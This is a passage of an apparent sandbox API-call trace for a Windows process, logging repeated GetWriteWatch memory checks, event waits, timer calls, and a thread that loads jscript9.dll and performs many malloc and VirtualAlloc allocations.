lpAddresses=0x73ffe20, lpdwCount=0x73ffe28, lpdwGranularity=0x73ffe24 | out: lpAddresses=0x73ffe20*=0xc5aa70, lpdwCount=0x73ffe28, lpdwGranularity=0x73ffe24) returned 0x0 [0186.813] GetWriteWatch (in: dwFlags=0x0, lpBaseAddress=0x759b000, dwRegionSize=0x1000, lpAddresses=0x73ffe20, lpdwCount=0x73ffe28, lpdwGranularity=0x73ffe24 | out: lpAddresses=0x73ffe20*=0xc5aa70, lpdwCount=0x73ffe28, lpdwGranularity=0x73ffe24) returned 0x0 [0186.813] GetWriteWatch (in: dwFlags=0x0, lpBaseAddress=0x759a000, dwRegionSize=0x1000, lpAddresses=0x73ffe20, lpdwCount=0x73ffe28, lpdwGranularity=0x73ffe24 | out: lpAddresses=0x73ffe20*=0xc5aa70, lpdwCount=0x73ffe28, lpdwGranularity=0x73ffe24) returned 0x0 [0186.813] GetWriteWatch (in: dwFlags=0x0, lpBaseAddress=0x7599000, dwRegionSize=0x1000, lpAddresses=0x73ffe20, lpdwCount=0x73ffe28, lpdwGranularity=0x73ffe24 | out: lpAddresses=0x73ffe20*=0xc5aa70, lpdwCount=0x73ffe28, lpdwGranularity=0x73ffe24) returned 0x0 [0186.813] GetWriteWatch (in: dwFlags=0x0, lpBaseAddress=0x7598000, dwRegionSize=0x1000, lpAddresses=0x73ffe20, lpdwCount=0x73ffe28, lpdwGranularity=0x73ffe24 | out: lpAddresses=0x73ffe20*=0xc5aa70, lpdwCount=0x73ffe28, lpdwGranularity=0x73ffe24) returned 0x0 [0186.813] GetWriteWatch (in: dwFlags=0x0, lpBaseAddress=0x7595000, dwRegionSize=0x1000, lpAddresses=0x73ffe20, lpdwCount=0x73ffe28, lpdwGranularity=0x73ffe24 | out: lpAddresses=0x73ffe20*=0xc5aa70, lpdwCount=0x73ffe28, lpdwGranularity=0x73ffe24) returned 0x0 [0186.813] GetWriteWatch (in: dwFlags=0x0, lpBaseAddress=0x758e000, dwRegionSize=0x1000, lpAddresses=0x73ffe20, lpdwCount=0x73ffe28, lpdwGranularity=0x73ffe24 | out: lpAddresses=0x73ffe20*=0xc5aa70, lpdwCount=0x73ffe28, lpdwGranularity=0x73ffe24) returned 0x0 [0186.814] GetWriteWatch (in: dwFlags=0x0, lpBaseAddress=0x758c000, dwRegionSize=0x1000, lpAddresses=0x73ffe20, lpdwCount=0x73ffe28, lpdwGranularity=0x73ffe24 | out: lpAddresses=0x73ffe20*=0xc5aa70, lpdwCount=0x73ffe28, lpdwGranularity=0x73ffe24) returned 0x0 [0186.814] GetWriteWatch (in: dwFlags=0x0, lpBaseAddress=0x7588000, dwRegionSize=0x1000, lpAddresses=0x73ffe20, lpdwCount=0x73ffe28, lpdwGranularity=0x73ffe24 | out: lpAddresses=0x73ffe20*=0xc5aa70, lpdwCount=0x73ffe28, lpdwGranularity=0x73ffe24) returned 0x0 [0186.814] GetWriteWatch (in: dwFlags=0x0, lpBaseAddress=0x7587000, dwRegionSize=0x1000, lpAddresses=0x73ffe20, lpdwCount=0x73ffe28, lpdwGranularity=0x73ffe24 | out: lpAddresses=0x73ffe20*=0xc5aa70, lpdwCount=0x73ffe28, lpdwGranularity=0x73ffe24) returned 0x0 [0186.814] GetWriteWatch (in: dwFlags=0x0, lpBaseAddress=0x7584000, dwRegionSize=0x1000, lpAddresses=0x73ffe20, lpdwCount=0x73ffe28, lpdwGranularity=0x73ffe24 | out: lpAddresses=0x73ffe20*=0xc5aa70, lpdwCount=0x73ffe28, lpdwGranularity=0x73ffe24) returned 0x0 [0186.814] GetWriteWatch (in: dwFlags=0x0, lpBaseAddress=0x7583000, dwRegionSize=0x1000, lpAddresses=0x73ffe20, lpdwCount=0x73ffe28, lpdwGranularity=0x73ffe24 | out: lpAddresses=0x73ffe20*=0xc5aa70, lpdwCount=0x73ffe28, lpdwGranularity=0x73ffe24) returned 0x0 [0186.814] GetWriteWatch (in: dwFlags=0x0, lpBaseAddress=0x7582000, dwRegionSize=0x1000, lpAddresses=0x73ffe20, lpdwCount=0x73ffe28, lpdwGranularity=0x73ffe24 | out: lpAddresses=0x73ffe20*=0xc5aa70, lpdwCount=0x73ffe28, lpdwGranularity=0x73ffe24) returned 0x0 [0186.814] GetWriteWatch (in: dwFlags=0x0, lpBaseAddress=0x741b000, dwRegionSize=0x1000, lpAddresses=0x73ffe20, lpdwCount=0x73ffe28, lpdwGranularity=0x73ffe24 | out: lpAddresses=0x73ffe20*=0xc5aa70, lpdwCount=0x73ffe28, lpdwGranularity=0x73ffe24) returned 0x0 [0186.814] GetWriteWatch (in: dwFlags=0x0, lpBaseAddress=0x7419000, dwRegionSize=0x1000, lpAddresses=0x73ffe20, lpdwCount=0x73ffe28, lpdwGranularity=0x73ffe24 | out: lpAddresses=0x73ffe20*=0xc5aa70, lpdwCount=0x73ffe28, lpdwGranularity=0x73ffe24) returned 0x0 [0186.814] GetWriteWatch (in: dwFlags=0x0, lpBaseAddress=0x7414000, dwRegionSize=0x1000, lpAddresses=0x73ffe20, lpdwCount=0x73ffe28, lpdwGranularity=0x73ffe24 | out: lpAddresses=0x73ffe20*=0xc5aa70, lpdwCount=0x73ffe28, lpdwGranularity=0x73ffe24) returned 0x0 [0186.814] GetWriteWatch (in: dwFlags=0x0, lpBaseAddress=0x7411000, dwRegionSize=0x1000, lpAddresses=0x73ffe20, lpdwCount=0x73ffe28, lpdwGranularity=0x73ffe24 | out: lpAddresses=0x73ffe20*=0xc5aa70, lpdwCount=0x73ffe28, lpdwGranularity=0x73ffe24) returned 0x0 [0186.814] GetWriteWatch (in: dwFlags=0x0, lpBaseAddress=0x740e000, dwRegionSize=0x1000, lpAddresses=0x73ffe20, lpdwCount=0x73ffe28, lpdwGranularity=0x73ffe24 | out: lpAddresses=0x73ffe20*=0xc5aa70, lpdwCount=0x73ffe28, lpdwGranularity=0x73ffe24) returned 0x0 [0186.814] GetWriteWatch (in: dwFlags=0x0, lpBaseAddress=0x740d000, dwRegionSize=0x1000, lpAddresses=0x73ffe20, lpdwCount=0x73ffe28, lpdwGranularity=0x73ffe24 | out: lpAddresses=0x73ffe20*=0xc5aa70, lpdwCount=0x73ffe28, lpdwGranularity=0x73ffe24) returned 0x0 [0186.814] GetWriteWatch (in: dwFlags=0x0, lpBaseAddress=0x740c000, dwRegionSize=0x1000, lpAddresses=0x73ffe20, lpdwCount=0x73ffe28, lpdwGranularity=0x73ffe24 | out: lpAddresses=0x73ffe20*=0xc5aa70, lpdwCount=0x73ffe28, lpdwGranularity=0x73ffe24) returned 0x0 [0186.814] GetWriteWatch (in: dwFlags=0x0, lpBaseAddress=0x740b000, dwRegionSize=0x1000, lpAddresses=0x73ffe20, lpdwCount=0x73ffe28, lpdwGranularity=0x73ffe24 | out: lpAddresses=0x73ffe20*=0xc5aa70, lpdwCount=0x73ffe28, lpdwGranularity=0x73ffe24) returned 0x0 [0186.814] GetWriteWatch (in: dwFlags=0x0, lpBaseAddress=0x7407000, dwRegionSize=0x1000, lpAddresses=0x73ffe20, lpdwCount=0x73ffe28, lpdwGranularity=0x73ffe24 | out: lpAddresses=0x73ffe20*=0xc5aa70, lpdwCount=0x73ffe28, lpdwGranularity=0x73ffe24) returned 0x0 [0186.814] GetWriteWatch (in: dwFlags=0x0, lpBaseAddress=0x7406000, dwRegionSize=0x1000, lpAddresses=0x73ffe20, lpdwCount=0x73ffe28, lpdwGranularity=0x73ffe24 | out: lpAddresses=0x73ffe20*=0xc5aa70, lpdwCount=0x73ffe28, lpdwGranularity=0x73ffe24) returned 0x0 [0186.814] GetWriteWatch (in: dwFlags=0x0, lpBaseAddress=0x7404000, dwRegionSize=0x1000, lpAddresses=0x73ffe20, lpdwCount=0x73ffe28, lpdwGranularity=0x73ffe24 | out: lpAddresses=0x73ffe20*=0xc5aa70, lpdwCount=0x73ffe28, lpdwGranularity=0x73ffe24) returned 0x0 [0186.814] GetWriteWatch (in: dwFlags=0x0, lpBaseAddress=0x7400000, dwRegionSize=0x1000, lpAddresses=0x73ffe20, lpdwCount=0x73ffe28, lpdwGranularity=0x73ffe24 | out: lpAddresses=0x73ffe20*=0xc5aa70, lpdwCount=0x73ffe28, lpdwGranularity=0x73ffe24) returned 0x0 [0186.814] GetWriteWatch (in: dwFlags=0x0, lpBaseAddress=0x759c000, dwRegionSize=0x1000, lpAddresses=0x73ffe0c, lpdwCount=0x73ffe14, lpdwGranularity=0x73ffe10 | out: lpAddresses=0x73ffe0c*=0x73ffe20, lpdwCount=0x73ffe14, lpdwGranularity=0x73ffe10) returned 0x0 [0186.815] GetWriteWatch (in: dwFlags=0x0, lpBaseAddress=0x9548000, dwRegionSize=0x1000, lpAddresses=0x73ffe0c, lpdwCount=0x73ffe14, lpdwGranularity=0x73ffe10 | out: lpAddresses=0x73ffe0c*=0x73ffe20, lpdwCount=0x73ffe14, lpdwGranularity=0x73ffe10) returned 0x0 [0186.815] GetWriteWatch (in: dwFlags=0x0, lpBaseAddress=0x7581000, dwRegionSize=0x1000, lpAddresses=0x73ffe0c, lpdwCount=0x73ffe14, lpdwGranularity=0x73ffe10 | out: lpAddresses=0x73ffe0c*=0x73ffe20, lpdwCount=0x73ffe14, lpdwGranularity=0x73ffe10) returned 0x0 [0186.815] GetWriteWatch (in: dwFlags=0x0, lpBaseAddress=0x7580000, dwRegionSize=0x1000, lpAddresses=0x73ffe0c, lpdwCount=0x73ffe14, lpdwGranularity=0x73ffe10 | out: lpAddresses=0x73ffe0c*=0x73ffe20, lpdwCount=0x73ffe14, lpdwGranularity=0x73ffe10) returned 0x0 [0186.815] GetWriteWatch (in: dwFlags=0x0, lpBaseAddress=0x741f000, dwRegionSize=0x1000, lpAddresses=0x73ffe0c, lpdwCount=0x73ffe14, lpdwGranularity=0x73ffe10 | out: lpAddresses=0x73ffe0c*=0x73ffe20, lpdwCount=0x73ffe14, lpdwGranularity=0x73ffe10) returned 0x0 [0186.815] GetWriteWatch (in: dwFlags=0x0, lpBaseAddress=0x741c000, dwRegionSize=0x1000, lpAddresses=0x73ffe0c, lpdwCount=0x73ffe14, lpdwGranularity=0x73ffe10 | out: lpAddresses=0x73ffe0c*=0x73ffe20, lpdwCount=0x73ffe14, lpdwGranularity=0x73ffe10) returned 0x0 [0186.815] GetWriteWatch (in: dwFlags=0x0, lpBaseAddress=0x741a000, dwRegionSize=0x1000, lpAddresses=0x73ffe0c, lpdwCount=0x73ffe14, lpdwGranularity=0x73ffe10 | out: lpAddresses=0x73ffe0c*=0x73ffe20, lpdwCount=0x73ffe14, lpdwGranularity=0x73ffe10) returned 0x0 [0186.815] GetWriteWatch (in: dwFlags=0x0, lpBaseAddress=0x7418000, dwRegionSize=0x1000, lpAddresses=0x73ffe0c, lpdwCount=0x73ffe14, lpdwGranularity=0x73ffe10 | out: lpAddresses=0x73ffe0c*=0x73ffe20, lpdwCount=0x73ffe14, lpdwGranularity=0x73ffe10) returned 0x0 [0186.815] GetWriteWatch (in: dwFlags=0x0, lpBaseAddress=0x7417000, dwRegionSize=0x1000, lpAddresses=0x73ffe0c, lpdwCount=0x73ffe14, lpdwGranularity=0x73ffe10 | out: lpAddresses=0x73ffe0c*=0x73ffe20, lpdwCount=0x73ffe14, lpdwGranularity=0x73ffe10) returned 0x0 [0186.815] GetWriteWatch (in: dwFlags=0x0, lpBaseAddress=0x7415000, dwRegionSize=0x1000, lpAddresses=0x73ffe0c, lpdwCount=0x73ffe14, lpdwGranularity=0x73ffe10 | out: lpAddresses=0x73ffe0c*=0x73ffe20, lpdwCount=0x73ffe14, lpdwGranularity=0x73ffe10) returned 0x0 [0186.815] GetWriteWatch (in: dwFlags=0x0, lpBaseAddress=0x7410000, dwRegionSize=0x1000, lpAddresses=0x73ffe0c, lpdwCount=0x73ffe14, lpdwGranularity=0x73ffe10 | out: lpAddresses=0x73ffe0c*=0x73ffe20, lpdwCount=0x73ffe14, lpdwGranularity=0x73ffe10) returned 0x0 [0186.815] GetWriteWatch (in: dwFlags=0x0, lpBaseAddress=0x740f000, dwRegionSize=0x1000, lpAddresses=0x73ffe0c, lpdwCount=0x73ffe14, lpdwGranularity=0x73ffe10 | out: lpAddresses=0x73ffe0c*=0x73ffe20, lpdwCount=0x73ffe14, lpdwGranularity=0x73ffe10) returned 0x0 [0186.815] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xc08020 | out: lpSystemTimeAsFileTime=0xc08020*(dwLowDateTime=0x75f3775d, dwHighDateTime=0x1d7d80b)) [0186.815] SetEvent (hEvent=0x38c) returned 1 [0186.815] WaitForMultipleObjectsEx (nCount=0x2, lpHandles=0x73ffef8*=0x390, bWaitAll=0, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x1 [0187.542] GetTickCount () returned 0x1d79647 [0187.542] WaitForMultipleObjectsEx (nCount=0x2, lpHandles=0x73ffef8*=0x390, bWaitAll=0, dwMilliseconds=0x3c9, bAlertable=0) returned 0x0 [0187.591] GetWriteWatch (in: dwFlags=0x0, lpBaseAddress=0x741c000, dwRegionSize=0x1000, lpAddresses=0x73ffe24, lpdwCount=0x73ffe2c, lpdwGranularity=0x73ffe28 | out: lpAddresses=0x73ffe24*=0x1, lpdwCount=0x73ffe2c, lpdwGranularity=0x73ffe28) returned 0x0 [0187.591] GetWriteWatch (in: dwFlags=0x0, lpBaseAddress=0x740b000, dwRegionSize=0x1000, lpAddresses=0x73ffe40, lpdwCount=0x73ffe48, lpdwGranularity=0x73ffe44 | out: lpAddresses=0x73ffe40*=0xc006e0, lpdwCount=0x73ffe48, lpdwGranularity=0x73ffe44) returned 0x0 [0187.591] GetWriteWatch (in: dwFlags=0x0, lpBaseAddress=0x759a000, dwRegionSize=0x1000, lpAddresses=0x73ffe40, lpdwCount=0x73ffe48, lpdwGranularity=0x73ffe44 | out: lpAddresses=0x73ffe40*=0xc006e0, lpdwCount=0x73ffe48, lpdwGranularity=0x73ffe44) returned 0x0 [0187.591] GetWriteWatch (in: dwFlags=0x0, lpBaseAddress=0x9536000, dwRegionSize=0x1000, lpAddresses=0x73ffe40, lpdwCount=0x73ffe48, lpdwGranularity=0x73ffe44 | out: lpAddresses=0x73ffe40*=0xc006e0, lpdwCount=0x73ffe48, lpdwGranularity=0x73ffe44) returned 0x0 [0187.591] GetWriteWatch (in: dwFlags=0x0, lpBaseAddress=0x9545000, dwRegionSize=0x1000, lpAddresses=0x73ffe40, lpdwCount=0x73ffe48, lpdwGranularity=0x73ffe44 | out: lpAddresses=0x73ffe40*=0xc006e0, lpdwCount=0x73ffe48, lpdwGranularity=0x73ffe44) returned 0x0 [0187.591] GetWriteWatch (in: dwFlags=0x0, lpBaseAddress=0x7410000, dwRegionSize=0x1000, lpAddresses=0x73ffe24, lpdwCount=0x73ffe2c, lpdwGranularity=0x73ffe28 | out: lpAddresses=0x73ffe24*=0x73ffe40, lpdwCount=0x73ffe2c, lpdwGranularity=0x73ffe28) returned 0x0 [0187.591] GetWriteWatch (in: dwFlags=0x0, lpBaseAddress=0x759b000, dwRegionSize=0x1000, lpAddresses=0x73ffe44, lpdwCount=0x73ffe50, lpdwGranularity=0x73ffe48 | out: lpAddresses=0x73ffe44*=0x0, lpdwCount=0x73ffe50, lpdwGranularity=0x73ffe48) returned 0x0 [0187.591] GetWriteWatch (in: dwFlags=0x0, lpBaseAddress=0x9535000, dwRegionSize=0x1000, lpAddresses=0x73ffe44, lpdwCount=0x73ffe50, lpdwGranularity=0x73ffe48 | out: lpAddresses=0x73ffe44*=0x0, lpdwCount=0x73ffe50, lpdwGranularity=0x73ffe48) returned 0x0 [0187.591] GetWriteWatch (in: dwFlags=0x0, lpBaseAddress=0x9540000, dwRegionSize=0x1000, lpAddresses=0x73ffe44, lpdwCount=0x73ffe50, lpdwGranularity=0x73ffe48 | out: lpAddresses=0x73ffe44*=0x0, lpdwCount=0x73ffe50, lpdwGranularity=0x73ffe48) returned 0x0 [0187.592] GetWriteWatch (in: dwFlags=0x0, lpBaseAddress=0x7404000, dwRegionSize=0x1000, lpAddresses=0x73ffe40, lpdwCount=0x73ffe48, lpdwGranularity=0x73ffe44 | out: lpAddresses=0x73ffe40*=0xc006e0, lpdwCount=0x73ffe48, lpdwGranularity=0x73ffe44) returned 0x0 [0187.592] GetWriteWatch (in: dwFlags=0x0, lpBaseAddress=0x740d000, dwRegionSize=0x1000, lpAddresses=0x73ffe40, lpdwCount=0x73ffe48, lpdwGranularity=0x73ffe44 | out: lpAddresses=0x73ffe40*=0xc006e0, lpdwCount=0x73ffe48, lpdwGranularity=0x73ffe44) returned 0x0 [0187.592] GetWriteWatch (in: dwFlags=0x0, lpBaseAddress=0x740e000, dwRegionSize=0x1000, lpAddresses=0x73ffe40, lpdwCount=0x73ffe48, lpdwGranularity=0x73ffe44 | out: lpAddresses=0x73ffe40*=0xc006e0, lpdwCount=0x73ffe48, lpdwGranularity=0x73ffe44) returned 0x0 [0187.592] GetWriteWatch (in: dwFlags=0x0, lpBaseAddress=0x741b000, dwRegionSize=0x1000, lpAddresses=0x73ffe40, lpdwCount=0x73ffe48, lpdwGranularity=0x73ffe44 | out: lpAddresses=0x73ffe40*=0xc006e0, lpdwCount=0x73ffe48, lpdwGranularity=0x73ffe44) returned 0x0 [0187.592] GetWriteWatch (in: dwFlags=0x0, lpBaseAddress=0x758c000, dwRegionSize=0x1000, lpAddresses=0x73ffe40, lpdwCount=0x73ffe48, lpdwGranularity=0x73ffe44 | out: lpAddresses=0x73ffe40*=0xc006e0, lpdwCount=0x73ffe48, lpdwGranularity=0x73ffe44) returned 0x0 [0187.592] GetWriteWatch (in: dwFlags=0x0, lpBaseAddress=0x9541000, dwRegionSize=0x1000, lpAddresses=0x73ffe40, lpdwCount=0x73ffe48, lpdwGranularity=0x73ffe44 | out: lpAddresses=0x73ffe40*=0xc006e0, lpdwCount=0x73ffe48, lpdwGranularity=0x73ffe44) returned 0x0 [0187.592] GetWriteWatch (in: dwFlags=0x0, lpBaseAddress=0x9547000, dwRegionSize=0x1000, lpAddresses=0x73ffe40, lpdwCount=0x73ffe48, lpdwGranularity=0x73ffe44 | out: lpAddresses=0x73ffe40*=0xc006e0, lpdwCount=0x73ffe48, lpdwGranularity=0x73ffe44) returned 0x0 [0187.592] GetWriteWatch (in: dwFlags=0x0, lpBaseAddress=0x741a000, dwRegionSize=0x1000, lpAddresses=0x73ffe24, lpdwCount=0x73ffe2c, lpdwGranularity=0x73ffe28 | out: lpAddresses=0x73ffe24*=0x73ffe40, lpdwCount=0x73ffe2c, lpdwGranularity=0x73ffe28) returned 0x0 [0187.592] GetWriteWatch (in: dwFlags=0x0, lpBaseAddress=0x7407000, dwRegionSize=0x1000, lpAddresses=0x73ffe40, lpdwCount=0x73ffe48, lpdwGranularity=0x73ffe44 | out: lpAddresses=0x73ffe40*=0xc006e0, lpdwCount=0x73ffe48, lpdwGranularity=0x73ffe44) returned 0x0 [0187.592] GetWriteWatch (in: dwFlags=0x0, lpBaseAddress=0x758e000, dwRegionSize=0x1000, lpAddresses=0x73ffe40, lpdwCount=0x73ffe48, lpdwGranularity=0x73ffe44 | out: lpAddresses=0x73ffe40*=0xc006e0, lpdwCount=0x73ffe48, lpdwGranularity=0x73ffe44) returned 0x0 [0187.592] GetWriteWatch (in: dwFlags=0x0, lpBaseAddress=0x740f000, dwRegionSize=0x1000, lpAddresses=0x73ffe24, lpdwCount=0x73ffe2c, lpdwGranularity=0x73ffe28 | out: lpAddresses=0x73ffe24*=0x73ffe40, lpdwCount=0x73ffe2c, lpdwGranularity=0x73ffe28) returned 0x0 [0187.592] GetWriteWatch (in: dwFlags=0x0, lpBaseAddress=0x7415000, dwRegionSize=0x1000, lpAddresses=0x73ffe24, lpdwCount=0x73ffe2c, lpdwGranularity=0x73ffe28 | out: lpAddresses=0x73ffe24*=0x73ffe40, lpdwCount=0x73ffe2c, lpdwGranularity=0x73ffe28) returned 0x0 [0187.592] GetWriteWatch (in: dwFlags=0x0, lpBaseAddress=0x7418000, dwRegionSize=0x1000, lpAddresses=0x73ffe24, lpdwCount=0x73ffe2c, lpdwGranularity=0x73ffe28 | out: lpAddresses=0x73ffe24*=0x73ffe40, lpdwCount=0x73ffe2c, lpdwGranularity=0x73ffe28) returned 0x0 [0187.592] GetWriteWatch (in: dwFlags=0x0, lpBaseAddress=0x7411000, dwRegionSize=0x1000, lpAddresses=0x73ffe40, lpdwCount=0x73ffe48, lpdwGranularity=0x73ffe44 | out: lpAddresses=0x73ffe40*=0xc006e0, lpdwCount=0x73ffe48, lpdwGranularity=0x73ffe44) returned 0x0 [0187.592] GetWriteWatch (in: dwFlags=0x0, lpBaseAddress=0x7417000, dwRegionSize=0x1000, lpAddresses=0x73ffe24, lpdwCount=0x73ffe2c, lpdwGranularity=0x73ffe28 | out: lpAddresses=0x73ffe24*=0x73ffe40, lpdwCount=0x73ffe2c, lpdwGranularity=0x73ffe28) returned 0x0 [0187.593] GetWriteWatch (in: dwFlags=0x0, lpBaseAddress=0x740c000, dwRegionSize=0x1000, lpAddresses=0x73ffe40, lpdwCount=0x73ffe48, lpdwGranularity=0x73ffe44 | out: lpAddresses=0x73ffe40*=0xc006e0, lpdwCount=0x73ffe48, lpdwGranularity=0x73ffe44) returned 0x0 [0187.593] GetWriteWatch (in: dwFlags=0x0, lpBaseAddress=0x7588000, dwRegionSize=0x1000, lpAddresses=0x73ffe40, lpdwCount=0x73ffe48, lpdwGranularity=0x73ffe44 | out: lpAddresses=0x73ffe40*=0xc006e0, lpdwCount=0x73ffe48, lpdwGranularity=0x73ffe44) returned 0x0 [0187.593] GetWriteWatch (in: dwFlags=0x0, lpBaseAddress=0x7406000, dwRegionSize=0x1000, lpAddresses=0x73ffe40, lpdwCount=0x73ffe48, lpdwGranularity=0x73ffe44 | out: lpAddresses=0x73ffe40*=0xc006e0, lpdwCount=0x73ffe48, lpdwGranularity=0x73ffe44) returned 0x0 [0187.593] GetWriteWatch (in: dwFlags=0x0, lpBaseAddress=0x7400000, dwRegionSize=0x1000, lpAddresses=0x73ffe40, lpdwCount=0x73ffe48, lpdwGranularity=0x73ffe44 | out: lpAddresses=0x73ffe40*=0xc006e0, lpdwCount=0x73ffe48, lpdwGranularity=0x73ffe44) returned 0x0 [0187.593] GetWriteWatch (in: dwFlags=0x0, lpBaseAddress=0x7587000, dwRegionSize=0x1000, lpAddresses=0x73ffe40, lpdwCount=0x73ffe48, lpdwGranularity=0x73ffe44 | out: lpAddresses=0x73ffe40*=0xc006e0, lpdwCount=0x73ffe48, lpdwGranularity=0x73ffe44) returned 0x0 [0187.593] GetWriteWatch (in: dwFlags=0x0, lpBaseAddress=0x7419000, dwRegionSize=0x1000, lpAddresses=0x73ffe40, lpdwCount=0x73ffe48, lpdwGranularity=0x73ffe44 | out: lpAddresses=0x73ffe40*=0xc006e0, lpdwCount=0x73ffe48, lpdwGranularity=0x73ffe44) returned 0x0 [0187.593] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xc08020 | out: lpSystemTimeAsFileTime=0xc08020*(dwLowDateTime=0x766a1f58, dwHighDateTime=0x1d7d80b)) [0187.593] SetEvent (hEvent=0x38c) returned 1 [0187.593] GetTickCount () returned 0x1d79676 [0187.593] WaitForMultipleObjectsEx (nCount=0x2, lpHandles=0x73ffef8*=0x390, bWaitAll=0, dwMilliseconds=0x39a, bAlertable=0) Thread: id = 42 os_tid = 0x8bc [0132.697] GetCurrentThreadId () returned 0x8bc [0132.698] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="C:\\Windows\\SYSTEM32\\jscript9.dll", phModule=0x755ff20 | out: phModule=0x755ff20*=0x6c9c0000) returned 1 [0132.698] SetEvent (hEvent=0x39c) returned 1 [0132.720] ResetEvent (hEvent=0x398) returned 1 [0132.720] WaitForSingleObject (hHandle=0x398, dwMilliseconds=0x3e8) returned 0x0 [0132.820] malloc (_Size=0x144) returned 0xc175c8 [0132.821] malloc (_Size=0x30) returned 0xc14be0 [0132.821] VirtualAlloc (lpAddress=0x0, dwSize=0x20000, flAllocationType=0x3000, flProtect=0x4) returned 0x75e0000 [0132.843] malloc (_Size=0x30) returned 0xc14c18 [0132.843] VirtualAlloc (lpAddress=0x0, dwSize=0x20000, flAllocationType=0x3000, flProtect=0x4) returned 0x7600000 [0132.844] malloc (_Size=0x60) returned 0xc17718 [0132.844] malloc (_Size=0x60) returned 0xc17780 [0132.844] malloc (_Size=0x60) returned 0xc177e8 [0132.844] malloc (_Size=0x60) returned 0xc17850 [0132.844] malloc (_Size=0x60) returned 0xc178b8 [0132.845] malloc (_Size=0x60) returned 0xc17920 [0132.845] malloc (_Size=0x60) returned 0xc17988 [0132.845] malloc (_Size=0x60) returned 0xc179f0 [0132.845] malloc (_Size=0x60) returned 0xc17a58 [0132.845] malloc (_Size=0x60) returned 0xc17ac0 [0132.845] malloc (_Size=0x60) returned 0xc17b28 [0132.845] malloc (_Size=0x60) returned 0xc17b90 [0132.845] malloc (_Size=0x60) returned 0xc17bf8 [0132.845] malloc (_Size=0x60) returned 0xc17c60 [0132.845] malloc (_Size=0x60) returned 0xc17cc8 [0132.846] malloc (_Size=0x60) returned 0xc17d30 [0132.846] malloc (_Size=0x60) returned 0xc12bb8 [0132.846] malloc (_Size=0x60) returned 0xc12fc8 [0132.846] malloc (_Size=0x60) returned 0xc12c88 [0132.846] malloc (_Size=0x60) returned 0xc12e28 [0132.846] malloc (_Size=0x60) returned 0xc12dc0 [0132.846] malloc (_Size=0x60) returned 0xc12e90 [0132.847] malloc (_Size=0x8) returned 0xc0f000 [0132.847] malloc (_Size=0xc) returned 0xc14338 [0132.847] malloc (_Size=0xc) returned 0xc14398 [0132.847] malloc (_Size=0xc) returned 0xc143c8 [0132.847] malloc (_Size=0x4) returned 0xc0b198 [0132.847] malloc (_Size=0x34) returned 0xc17d98 [0132.847] malloc (_Size=0xc) returned 0xc143e0 [0132.847] malloc (_Size=0xc) returned 0xc14428 [0132.847] malloc (_Size=0x4) returned 0xc128f0 [0132.847] malloc (_Size=0x30) returned 0xc14ac8 [0132.847] malloc (_Size=0xc) returned 0xc136a0 [0132.847] malloc (_Size=0xc) returned 0xc13640 [0132.847] malloc (_Size=0x8) returned 0xc12900 [0132.847] malloc (_Size=0xc) returned 0xc136b8 [0132.847] malloc (_Size=0xc) returned 0xc13658 [0132.847] malloc (_Size=0xc) returned 0xc13688 [0132.847] malloc (_Size=0x4) returned 0xc17dd8 [0132.847] malloc (_Size=0x34) returned 0xc17de8 [0132.848] malloc (_Size=0xc) returned 0xc135f8 [0132.848] malloc (_Size=0xc) returned 0xc13670 [0132.848] malloc (_Size=0x4) returned 0xc17e28 [0132.848] malloc (_Size=0x30) returned 0xc14b38 [0132.848] malloc (_Size=0xc) returned 0xc13610 [0132.848] malloc (_Size=0xc) returned 0xc13628 [0132.848] malloc (_Size=0x8) returned 0xc17e38 [0132.848] malloc (_Size=0xc) returned 0xc13370 [0132.848] malloc (_Size=0xc) returned 0xc134d8 [0132.848] malloc (_Size=0xc) returned 0xc13310 [0132.848] malloc (_Size=0x4) returned 0xc17e48 [0132.848] malloc (_Size=0x34) returned 0xc17e58 [0132.849] malloc (_Size=0xc) returned 0xc13568 [0132.849] malloc (_Size=0xc) returned 0xc134f0 [0132.849] malloc (_Size=0x4) returned 0xc17e98 [0132.849] malloc (_Size=0x30) returned 0xc14908 [0132.849] malloc (_Size=0xc) returned 0xc13328 [0132.849] malloc (_Size=0xc) returned 0xc135b0 [0132.849] malloc (_Size=0x8) returned 0xc17ea8 [0132.849] malloc (_Size=0xc) returned 0xc13508 [0132.849] malloc (_Size=0xc) returned 0xc13358 [0132.849] malloc (_Size=0xc) returned 0xc133e8 [0132.849] malloc (_Size=0x4) returned 0xc17eb8 [0132.849] malloc (_Size=0x34) returned 0xc17ec8 [0132.849] malloc (_Size=0xc) returned 0xc13400 [0132.849] malloc (_Size=0xc) returned 0xc132f8 [0132.849] malloc (_Size=0x4) returned 0xc17f08 [0132.849] malloc (_Size=0x30) returned 0xc14898 [0132.850] malloc (_Size=0xc) returned 0xc13520 [0132.850] malloc (_Size=0xc) returned 0xc134c0 [0132.850] malloc (_Size=0x4) returned 0xc17f18 [0132.850] malloc (_Size=0x30) returned 0xc14b70 [0132.850] malloc (_Size=0xc) returned 0xc13418 [0132.850] malloc (_Size=0xc) returned 0xc133b8 [0132.850] malloc (_Size=0x4) returned 0xc17f28 [0132.850] malloc (_Size=0x30) returned 0xc14b00 [0132.850] malloc (_Size=0xc) returned 0xc13388 [0132.850] malloc (_Size=0xc) returned 0xc13430 [0132.850] malloc (_Size=0x4) returned 0xc17f38 [0132.850] malloc (_Size=0x30) returned 0xc148d0 [0132.850] malloc (_Size=0xc) returned 0xc13340 [0132.850] malloc (_Size=0xc) returned 0xc133a0 [0132.850] malloc (_Size=0x4) returned 0xc17f48 [0132.850] malloc (_Size=0x30) returned 0xc14a20 [0132.850] malloc (_Size=0xc) returned 0xc13538 [0132.850] malloc (_Size=0xc) returned 0xc13550 [0132.850] malloc (_Size=0x4) returned 0xc13758 [0132.850] malloc (_Size=0x30) returned 0xc14940 [0132.851] malloc (_Size=0xc) returned 0xc13580 [0132.851] malloc (_Size=0xc) returned 0xc134a8 [0132.851] malloc (_Size=0x8) returned 0xc137c8 [0132.851] malloc (_Size=0xc) returned 0xc13478 [0132.851] malloc (_Size=0xc) returned 0xc13598 [0132.851] malloc (_Size=0xc) returned 0xc133d0 [0132.851] malloc (_Size=0x4) returned 0xc13728 [0132.851] malloc (_Size=0x34) returned 0xc17f58 [0132.851] malloc (_Size=0xc) returned 0xc135c8 [0132.851] malloc (_Size=0xc) returned 0xc13448 [0132.851] malloc (_Size=0x4) returned 0xc136f8 [0132.851] malloc (_Size=0x34) returned 